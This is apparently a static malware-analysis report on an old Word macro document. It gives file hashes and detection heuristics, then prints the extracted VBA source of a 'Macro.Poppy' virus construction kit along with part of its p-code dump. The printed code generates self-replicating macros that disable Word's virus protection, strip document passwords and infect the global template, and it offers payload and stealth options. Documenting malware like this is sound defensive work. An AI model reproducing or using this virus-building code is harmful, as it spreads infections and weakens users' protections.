Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb0d9e5679823b28…

MALICIOUS

Office (OLE)

528.0 KB Created: 1998-01-05 21:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 756180bdced6815901a7e4c857b7b30e SHA-1: 68a6aec8cd012f2cd0a5057ca9435176cc45a2a7 SHA-256: eb0d9e5679823b28e6c9915060916e706fc789c8057d8df762df2c8b22c81b01
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Auto_Close, indicating malicious intent. The document body presents a deceptive End-User License Agreement for a tool that explicitly states it is designed to create macro viruses. The presence of ClamAV detection on an extracted artifact further supports its malicious nature.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Print #hFile, "    .VirusProtection = False"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x06 bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'push' is 79% of instructions — a sled or padding/filler run, not program logic).
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51568 bytes
SHA-256: ba3f75421c073e960542ca2e70f62fd1ea3cf048d3a7b3bb7db8eb15259a3d3f
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "WelcomeFrm"
Attribute VB_Base = "0{87F3A4A7-87A5-11D1-9F3A-444553540000}{87F3A471-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Begin1Btn_Click()
    WelcomeFrm.Hide
    PoppyStartFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub Image1_Click()
    MsgBox "Don't click on me you IDIOT!!", vbExclamation, "The Narkotic Network"
    MsgBox "No info here but keep trying :)  ... there are lots of hidden hints and bits of information.", vbExclamation, "The Narkotic Network"
End Sub


Attribute VB_Name = "VMPCK"
Public Payload As Integer
Public Trigger As Integer
Public Noise As Integer
Public Stealth As Integer
Public Message As Integer
Public Skip As Integer

Public AO As Boolean        'AutoOpen
Public AC As Boolean        'AutoClose
Public AEXIT As Boolean     'AutoExit
Public AEXEC As Boolean     'AutoExec
Public FP As Boolean        'File|Print
Public FS As Boolean        'File|Save
Public FC As Boolean        'File|Close
Public FE As Boolean        'File|Exit
Public TOOL As Boolean      'Tools|Options
Public FN As Boolean        'File|New
Public ROR_X As Boolean     'Read-Only Remover
Public ID_X As Boolean      'Icon Disco
Public DP_X As Boolean      'Document Properties


Sub AutoOpen()

    Skip = 0
    Payload = 0
    Trigger = 0
    Noise = 0
    Stealth = 0
    Message = 0

    WelcomeFrm.Show
    
End Sub

Sub vBuildPoppy(strFile As String)
 
 Dim hFile As Long
 
 Randomize
 
ID1 = Int(Rnd * 9999)
ID2 = Int(Rnd * 9999)
ID3 = ID1 - ID2

     hFile = FreeFile
     Open strFile For Output Access Write As hFile
     
' H E A D E R & S T A R T OF Sub MacPoppy

    Print #hFile, "Attribute VB_Name = ""MacPoppy"""
    Print #hFile, "Sub MacPoppy()"
    Print #hFile, "    "
    Print #hFile, "    'Produced by The VicodinES Macro.Poppy Construction Kit"
    Print #hFile, "    '======================================================"
    Print #hFile, "    'Code Written by VicodinES"
    Print #hFile, "    'Poppy ID : " & ID1 & ID2 & ID3
    Print #hFile, "    "
    Print #hFile, "    "
    Print #hFile, "On Error Resume Next"

' Click The Basics

    Print #hFile, "With Options"
    Print #hFile, "    .ConfirmConversions = False"
    Print #hFile, "    .VirusProtection = False"
    Print #hFile, "    .SaveNormalPrompt = False"
    Print #hFile, "End With"
    
    Print #hFile, "With ActiveDocument"
    Print #hFile, "    .ReadOnlyRecommended = False"
    Print #hFile, "    .Password = """
    Print #hFile, "    .WritePassword = """
        
    Print #hFile, "End With"

' Start of Infection Routine

    Print #hFile, "trip = 0"
    Print #hFile, "what$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))"
    
' Check Read-Only Remover Status

If ROR_X = True Then

    Print #hFile, "msfile$ = ""c:\windows\startm~1\programs\startup\msfile.bat"""
    Print #hFile, "nfat = GetAttr(NormalTemplate.FullName)"
    Print #hFile, "If nfat = vbReadOnly Then Call vBitchES(msfile$)"
    Print #hFile, "If nfat = vbReadOnly + vbArchive Then Call vBitchES(msfile$)"
    Print #hFile, "If nfat = vbReadOnly Then GoTo fuckoff"
    Print #hFile, "If nfat = vbReadOnly + vbArchive Then GoTo fuckoff"

End If
    
' Continue Infection Routine
    
    Print #hFile, "If what$ = UCase(NormalTemplate) Then trip = 1"
    Print #hFile, "If trip = 1 Then one$ = NormalTemplate.FullName Else one$ = ActiveDocument.FullName"
    Print #hFile, "If trip = 1 Then two$ = ActiveDocument.FullName Else two$ = NormalTemplate.FullName"
    Print #hFile, "    "
    Print #hFile, "Application.OrganizerCopy Source:=one$, Destination:=two$, Name:=""MacPoppy"", Object:=wdOrganizerObjectProjectItems"
    Print #hFile, "    "
    Print #hFile, "If trip = 1 Then If Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName"
    Print #hFile, "If trip = 0 Then"
    Print #hFile, "     If NormalTemplate.Saved = False Then NormalTemplate.Save"


    Close hFile
     

End Sub






Attribute VB_Name = "PoppyStartFrm"
Attribute VB_Base = "0{87F3A4AB-87A5-11D1-9F3A-444553540000}{87F3A479-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    PoppyStartFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub Image1_Click()
    MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub

Private Sub Image2_Click()
    MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub

Private Sub InfoBtn_Click()
    PoppyStartFrm.Hide
    PoppyInfoFrm.Show
End Sub

Private Sub Label1_Click()
    MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
End Sub

Private Sub Label2_Click()
    MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
End Sub

Private Sub UserForm_Click()
    MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
    
End Sub

Attribute VB_Name = "PoppyOptionsFrm"
Attribute VB_Base = "0{87F3A4AF-87A5-11D1-9F3A-444553540000}{87F3A47B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    PoppyOptionsFrm.Hide
    MakeFrm.Show
End Sub

Private Sub CommandButton2_Click()
    PoppyOptionsFrm.Hide
    MethodOfInfectionFrm.Show
End Sub

Private Sub CommandButton3_Click()
    PoppyOptionsFrm.Hide
    NoiseLevelFrm.Show
End Sub

Private Sub CommandButton4_Click()
    PoppyOptionsFrm.Hide
    StealthFrm.Show
End Sub

Private Sub CommandButton5_Click()
    PoppyOptionsFrm.Hide
    PayloadFrm.Show
End Sub

Private Sub CommandButton7_Click()
    PoppyOptionsFrm.Hide
    MsgBoxFrm.Show
End Sub

Private Sub CommandButton8_Click()
    PoppyOptionsFrm.Hide
    ExtrasFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Attribute VB_Name = "MethodOfInfectionFrm"
Attribute VB_Base = "0{87F3A4BB-87A5-11D1-9F3A-444553540000}{87F3A47D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub AutoCloseBtn_Click()
    If AutoCloseBtn = True Then AC = True
End Sub

Private Sub AutoExecBtn_Click()
    If AutoExecBtn = True Then AEXEC = True
End Sub

Private Sub AutoExitBtn_Click()
    If AutoExitBtn = True Then AEXIT = True
End Sub

Private Sub AutoOpenBtn_Click()
    If AutoOpenBtn = True Then AO = True
End Sub

Private Sub CommandButton1_Click()
    MethodOfInfectionFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub FileCloseBtn_Click()
    If FileCloseBtn = True Then FC = True
End Sub

Private Sub FileExitBtn_Click()
    If FileExitBtn = True Then FE = True
End Sub

Private Sub FileNewBtn_Click()
    If FileNewBtn = True Then FN = True
End Sub

Private Sub FilePrintBtn_Click()
    If FilePrintBtn = True Then FP = True
End Sub

Private Sub FileSaveBtn_Click()
    If FileSaveBtn = True Then FS = True
End Sub

Private Sub ToolsOptionsBtn_Click()
    If ToolsOptionsBtn = True Then TOLL = True
End Sub


Attribute VB_Name = "NoiseLevelFrm"
Attribute VB_Base = "0{87F3A4BF-87A5-11D1-9F3A-444553540000}{87F3A47F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    NoiseLevelFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub CommandButton18_Click()
    NoiseInfoFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub OptionButton1_Click()
    If OptionButton1.Value = True Then Noise = 0
End Sub

Private Sub OptionButton2_Click()
    If OptionButton2.Value = True Then Noise = 1
End Sub

Private Sub OptionButton3_Click()
    If OptionButton3.Value = True Then Noise = 3
End Sub

Private Sub OptionButton4_Click()
    If OptionButton4.Value = True Then Noise = 2
End Sub

Private Sub OptionButton5_Click()
    If OptionButton5.Value = True Then Noise = 5
End Sub

Private Sub OptionButton6_Click()
    If OptionButton6.Value = True Then Noise = 4
End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "StealthFrm"
Attribute VB_Base = "0{87F3A4C3-87A5-11D1-9F3A-444553540000}{87F3A481-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub BasicStealthBtn_Click()
    If BasicStealthBtn.Value = True Then Stealth = 1
End Sub

Private Sub CommandButton1_Click()
    StealthFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub InfectionStealthBtn_Click()
    If InfectionStealthBtn.Value = True Then Stealth = 2
End Sub

Private Sub NoStealthBtn_Click()
    If NoStealthBtn.Value = True Then Stealth = 0
End Sub

Attribute VB_Name = "PoppyInfoFrm"
Attribute VB_Base = "0{87F3A4C7-87A5-11D1-9F3A-444553540000}{87F3A483-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    PoppyInfoFrm.Hide
    PoppyStartFrm.Show
End Sub

Private Sub CommandButton2_Click()
    NarkoticFrm.Show
End Sub

Attribute VB_Name = "NarkoticFrm"
Attribute VB_Base = "0{87F3A4CB-87A5-11D1-9F3A-444553540000}{87F3A485-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()
    MsgBox "Greetz to Cicatrix and Spanska  !!", vbInformation, "The Narkotic Network"
    MsgBox "If you want to contact VicodinES or the Narkotic Network then write to vcru@hotmail.com", vbInformation, "The Narkotic Network"
End Sub

Private Sub MailBtn_Click()
ActiveDocument.FollowHyperlink Address:= _
        "mailto:vcru@hotmail.com" _
        , NewWindow:=False, AddHistory:=False
End Sub

Attribute VB_Name = "ExtrasFrm"
Attribute VB_Base = "0{87F3A4B7-87A5-11D1-9F3A-444553540000}{87F3A487-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CommandButton1_Click()
    ExtrasFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub CommandButton2_Click()
    ExtrasFrm.Hide
    ExtrasInfoFrm.Show
End Sub

Private Sub CommandButton3_Click()
    RemoveROFrm.Show
End Sub

Private Sub CommandButton4_Click()
    IconDiscoFrm.Show
End Sub

Private Sub CommandButton6_Click()
    ChngDocPropFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub DPBox_Click()
    If DPBox = True Then DP_X = True
End Sub

Private Sub IDBox_Click()
    If IDBox = True Then ID_X = True
End Sub

Private Sub RORBox_Click()
    If RORBox = True Then ROR_X = True
End Sub

Attribute VB_Name = "RemoveROFrm"
Attribute VB_Base = "0{87F3A4CF-87A5-11D1-9F3A-444553540000}{87F3A489-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    RemoveROFrm.Hide
End Sub

Private Sub Label1_Click()
    MsgBox "This code was originally released in the Blee.Poppy macro virus family.", vbInformation, "The Narkotic Network"
    MsgBox "The Blee.Poppy family has been ID'd as W97M/Blee", vbInformation, "The Narkotic Network"
End Sub

Private Sub UserForm_Click()
    MsgBox "This code was originally released in the Blee.Poppy macro virus family.", vbInformation, "The Narkotic Network"
    MsgBox "The Blee.Poppy family has been ID'd as W97M/Blee", vbInformation, "The Narkotic Network"
End Sub

Attribute VB_Name = "ExtrasInfoFrm"
Attribute VB_Base = "0{87F3A4D3-87A5-11D1-9F3A-444553540000}{87F3A48B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    ExtrasInfoFrm.Hide
    ExtrasFrm.Show
End Sub

Attribute VB_Name = "IconDiscoFrm"
Attribute VB_Base = "0{87F3A4D7-87A5-11D1-9F3A-444553540000}{87F3A48D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    IconDiscoFrm.Hide
End Sub

Private Sub Label1_Click()
    MsgBox "This code was originally released in the Disco.Poppy macro virus family.", vbInformation, "The Narkotic Network"
    MsgBox "The Disco.Poppy family has been ID'd as W97M/Disco", vbInformation, "The Narkotic Network"
End Sub

Private Sub UserForm_Click()
    MsgBox "This code was originally released in the Disco.Poppy macro virus family.", vbInformation, "The Narkotic Network"
    MsgBox "The Disco.Poppy family has been ID'd as W97M/Disco", vbInformation, "The Narkotic Network"
End Sub

Attribute VB_Name = "ChngDocPropFrm"
Attribute VB_Base = "0{87F3A4DB-87A5-11D1-9F3A-444553540000}{87F3A48F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub ExitBtn_Click()
    ChngDocPropFrm.Hide
End Sub

Private Sub InfoBtn_Click()
    ChngDocPropInfoFrm.Show
End Sub

Private Sub Label1_Click()
    MsgBox "This code was originally released in the Blee.Poppy and Cartman.Poppy macro virus family.", vbInformation, "The Narkotic Network"
End Sub

Private Sub UserForm_Click()
    MsgBox "This code was originally released in the Blee.Poppy and Cartman.Poppy macro virus family.", vbInformation, "The Narkotic Network"
End Sub

Attribute VB_Name = "PayloadFrm"
Attribute VB_Base = "0{87F3A4DF-87A5-11D1-9F3A-444553540000}{87F3A491-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    PayloadFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub ExitBtn_Click()
    ActiveDocument.Close
    End
End Sub

Private Sub CommandButton16_Click()
    RandomInfoFrm.Show
End Sub

Private Sub CommandButton17_Click()
    DateTimeInfoFrm.Show
End Sub

Private Sub CommandButton18_Click()
    StealthActiveFrm.Show
End Sub

Private Sub CommandButton19_Click()
    NoPayloadFrm.Show
End Sub

Private Sub NoPayloadBtn_Click()
    If NoPayloadBtn = True Then Trigger = 0
    If NoPayloadBtn = True Then Paylod = 0
End Sub

Private Sub PDateBtn_Click()
    If PDateBtn = True Then Trigger = 1
End Sub

Private Sub PPCloseWBtn_Click()
    If PPCloseBtn = True Then Payload = 3
End Sub

Private Sub PPCloseWrdBtn_Click()
    If PPCloseWrdBtn = True Then Payload = 4
End Sub

Private Sub PPKillBtn_Click()
    If PPKillBtn = True Then Payload = 6
End Sub

Private Sub PPPrintBtn_Click()
    If PPPrintBtn = True Then Payload = 5
End Sub

Private Sub PPReplaceBtn_Click()
    If PPReplaceBtn = True Then Payload = 2
End Sub

Private Sub PPWebBtn_Click()
    If PPWebBtn = True Then Payload = 1
End Sub

Private Sub PRandomBtn_Click()
    If PRandomBtn = True Then Trigger = 2
End Sub

Private Sub PStealthBtn_Click()
    If PStealthBtn = True Then Trigger = 3
End Sub

Attribute VB_Name = "NoiseInfoFrm"
Attribute VB_Base = "0{87F3A4E3-87A5-11D1-9F3A-444553540000}{87F3A493-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    NoiseInfoFrm.Hide
End Sub

Attribute VB_Name = "DateTimeInfoFrm"
Attribute VB_Base = "0{87F3A4E7-87A5-11D1-9F3A-444553540000}{87F3A495-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    DateTimeInfoFrm.Hide
End Sub

Attribute VB_Name = "RandomInfoFrm"
Attribute VB_Base = "0{87F3A4EB-87A5-11D1-9F3A-444553540000}{87F3A497-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    RandomInfoFrm.Hide
End Sub

Attribute VB_Name = "StealthActiveFrm"
Attribute VB_Base = "0{87F3A4EF-87A5-11D1-9F3A-444553540000}{87F3A499-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    StealthActiveFrm.Hide
End Sub

Attribute VB_Name = "NoPayloadFrm"
Attribute VB_Base = "0{87F3A4F3-87A5-11D1-9F3A-444553540000}{87F3A49B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
    NoPayloadFrm.Hide
End Sub

Attribute VB_Name = "MakeFrm"
Attribute VB_Base = "0{87F3A4B3-87A5-11D1-9F3A-444553540000}{87F3A49D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ForgetBtn_Click()
    MakeFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Private Sub MakeBtn_Click()
    Call vBuildPoppy("c:\windows\desktop\macpoppy.bas")
End Sub

Attribute VB_Name = "MsgBoxFrm"
Attribute VB_Base = "0{87F3A4F7-87A5-11D1-9F3A-444553540000}{87F3A49F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub BdaySettingsBtn_Click()
    BdaySettingsFrm.Show
End Sub

Private Sub CommandButton1_Click()
    MsgBoxFrm.Hide
    PoppyOptionsFrm.Show
End Sub

Attribute VB_Name = "QuickExitBtn"
Attribute VB_Base = "0{87F3A4FB-87A5-11D1-9F3A-444553540000}{87F3A4A1-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    ActiveDocument.Close
    End
End Sub

Attribute VB_Name = "BdaySettingsFrm"
Attribute VB_Base = "0{87F3A4FF-87A5-11D1-9F3A-444553540000}{87F3A4A3-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    BdaySettingsFrm.Hide
End Sub

' Processing file: /tmp/qstore_f_4nccbi
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1838 bytes
' Macros/VBA/WelcomeFrm - 4927 bytes
' Line #0:
' 	FuncDefn (Private Sub Begin1Btn_Click())
' Line #1:
' 	Ld WelcomeFrm 
' 	ArgsMemCall Hide 0x0000 
' Line #2:
' 	Ld PoppyStartFrm 
' 	ArgsMemCall Show 0x0000 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' 	FuncDefn (Private Sub ExitBtn_Click())
' Line #6:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #7:
' 	End 
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Private Sub Image1_Click())
' Line #11:
' 	LitStr 0x001D "Don't click on me you IDIOT!!"
' 	Ld vbExclamation 
' 	LitStr 0x0014 "The Narkotic Network"
' 	ArgsCall MsgBox 0x0003 
' Line #12:
' 	LitStr 0x005C "No info here but keep trying :)  ... there are lots of hidden hints and bits of information."
' 	Ld vbExclamation 
' 	LitStr 0x0014 "The Narkotic Network"
' 	ArgsCall MsgBox 0x0003 
' Line #13:
' 	EndSub 
' Line #14:
' Macros/VBA/VMPCK - 9298 bytes
' Line #0:
' 	Dim (Public) 
' 	VarDefn Payload (As Integer)
' Line #1:
' 	Dim (Public) 
' 	VarDefn Trigger (As Integer)
' Line #2:
' 	Dim (Public) 
' 	VarDefn Noise (As Integer)
' Line #3:
' 	Dim (Public) 
' 	VarDefn Stealth (As Integer)
' Line #4:
' 	Dim (Public) 
' 	VarDefn Message (As Integer)
' Line #5:
' 	Dim (Public) 
' 	VarDefn Skip (As Integer)
' Line #6:
' Line #7:
' 	Dim (Public) 
' 	VarDefn AO (As Boolean)
' 	QuoteRem 0x001C 0x0008 "AutoOpen"
' Line #8:
' 	Dim (Public) 
' 	VarDefn AC (As Boolean)
' 	QuoteRem 0x001C 0x0009 "AutoClose"
' Line #9:
' 	Dim (Public) 
' 	VarDefn AEXIT (As Boolean)
' 	QuoteRem 0x001C 0x0008 "AutoExit"
' Line #10:
' 	Dim (Public) 
' 	VarDefn AEXEC (As Boolean)
' 	QuoteRem 0x001C 0x0008 "AutoExec"
' Line #11:
' 	Dim (Public) 
' 	VarDefn FP (As Boolean)
' 	QuoteRem 0x001C 0x000A "File|Print"
' Line #12:
' 	Dim (Public) 
' 	VarDefn FS (As Boolean)
' 	QuoteRem 0x001C 0x0009 "File|Save"
' Line #13:
' 	Dim (Public) 
' 	VarDefn FC (As Boolean)
' 	QuoteRem 0x001C 0x000A "File|Close"
' Line #14:
' 	Dim (Public) 
' 	VarDefn FE (As Boolean)
' 	QuoteRem 0x001C 0x0009 "File|Exit"
' Line #15:
' 	Dim (Public) 
' 	VarDefn TOOL (As Boolean)
' 	QuoteRem 0x001C 0x000D "Tools|Options"
' Line #16:
' 	Dim (Public) 
' 	VarDefn FN (As Boolean)
' 	QuoteRem 0x001C 0x0008 "File|New"
' Line #17:
' 	Dim (Public) 
' 	VarDefn ROR_X (As Boolean)
' 	QuoteRem 0x001C 0x0011 "Read-Only Remover"
' Line #18:
' 	Dim (Public) 
' 	VarDefn ID_X (As Boolean)
' 	QuoteRem 0x001C 0x000A "Icon Disco"
' Line #19:
' 	Dim (Public) 
' 	VarDefn DP_X (As Boolean)
' 	QuoteRem 0x001C 0x0013 "Document Properties"
' Line #20:
' Line #21:
' Line #22:
' 	FuncDefn (Sub AutoOpen())
' Line #23:
' Line #24:
' 	LitDI2 0x0000 
' 	St Skip 
' Line #25:
' 	LitDI2 0x0000 
' 	St Payload 
' Line #26:
' 	LitDI2 0x0000 
' 	St Trigger 
' Line #27:
' 	LitDI2 0x0000 
' 	St Noise 
' Line #28:
' 	LitDI2 0x0000 
' 	St Stealth 
' Line #29:
' 	LitDI2 0x0000 
' 	St Message 
' Line #30:
' Line #31:
' 	Ld WelcomeFrm 
' 	ArgsMemCall Show 0x0000 
' Line #32:
' Line #33:
' 	EndSub 
' Line #34:
' Line #35:
' 	FuncDefn (Sub vBuildPoppy(strFile As String))
' Line #36:
' Line #37:
' 	Dim 
' 	VarDefn hFile (As Long)
' Line #38:
' Line #39:
' 	ArgsCall Read 0x0000 
' Line #40:
' Line #41:
' 	Ld Rnd 
' 	LitDI2 0x270F 
' 	Mul 
' 	FnInt 
' 	St ID1 
' Line #42:
' 	Ld Rnd 
' 	LitDI2 0x270F 
' 	Mul 
' 	FnInt 
' 	St ID2 
' Line #43:
' 	Ld ID1 
' 	Ld ID2 
' 	Sub 
' 	St ID3 
' Line #44:
' Line #45:
' 	Ld Friend 
' 	St hFile 
' Line #46:
' 	Ld strFile 
' 	Ld hFile 
' 	LitDefault 
' 	Open (For Output Access Write)
' Line #47:
' Line #48:
' 	QuoteRem 0x0000 0x0028 " H E A D E R & S T A R T OF Sub MacPoppy"
' Line #49:
' Line #50:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001E "Attribute VB_Name = "MacPoppy""
' 	PrintItemNL 
' Line #51:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x000E "Sub MacPoppy()"
' 	PrintItemNL 
' Line #52:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0004 "    "
' 	PrintItemNL 
' Line #53:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x003B "    'Produced by The VicodinES Macro.Poppy Construction Kit"
' 	PrintItemNL 
' Line #54:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x003B "    '======================================================"
' 	PrintItemNL 
' Line #55:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001E "    'Code Written by VicodinES"
' 	PrintItemNL 
' Line #56:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0010 "    'Poppy ID : "
' 	Ld ID1 
' 	Concat 
' 	Ld ID2 
' 	Concat 
' 	Ld ID3 
' 	Concat 
' 	PrintItemNL 
' Line #57:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0004 "    "
' 	PrintItemNL 
' Line #58:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0004 "    "
' 	PrintItemNL 
' Line #59:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0014 "On Error Resume Next"
' 	PrintItemNL 
' Line #60:
' Line #61:
